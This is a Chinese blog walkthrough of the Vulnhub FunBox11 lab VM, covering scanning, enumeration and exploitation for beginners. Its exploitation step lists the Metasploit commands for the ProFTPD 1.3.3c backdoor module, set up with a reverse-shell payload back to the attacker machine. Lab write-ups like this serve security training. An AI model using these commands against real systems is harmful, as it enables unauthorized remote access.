看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11（Scriptkiddie）

Vulnhub靶机介绍：

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

老样子需要找到flag即可。

Vulnhub靶机下载：

https://download.vulnhub.com/funbox/Funbox11.ova

Vulnhub靶机安装：

下载好了把安装包解压 然后导入Oracle VM打开即可。

Vulnhub靶机漏洞详解：

①：信息收集：

kali里使用netdiscover发现主机

渗透机：kali IP ：172.16.5.107 靶机IP ：172.16.5.4

ping的通 环境搭建成功！

通过nmap 扫描发现开启了21，22和25，80，139，143，445端口 访问80端口 简单dirb 扫描一下 发现是 Wordpress

需要添加 /etc/hosts funbox11

②：FTP匿名登入：

因为开启了 21 端口 可以尝试 ftp匿名登入 登入失败 所以不行！！

③：漏洞发现：

通过刚刚的扫描发现FTP 版本号为1.3.3c searchsploit 搜索本地漏洞库！

③：漏洞利用：

metasploit执行漏洞 具体看下面代码！

use exploit/unix/ftp/proftpd_133c_backdoor  #使用模块
show options  #查看选项
set RHOSTS 172.16.5.4  #设置目标靶机
show payloads   #查看 payload
set payload payload/cmd/unix/reverse   #设置payload 
show options  
set LHOST 172.16.5.107  #设置本机ip
exploit
1
2
3
4
5
6
7
8

④：获取flag：

至此获取到了所有得flag，渗透测试结束。

Vulnhub靶机渗透总结：

FunBox系列第十一个靶机了 也是最后一个比较简单
1.信息收集 获取ip地址 和端口信息
2.metasploit 的基本操作
3. 了解 ProFTPD 1.3.3c 后门命令执行漏洞

这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助！ 至此这个系列更新完啦！🙂
最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐！！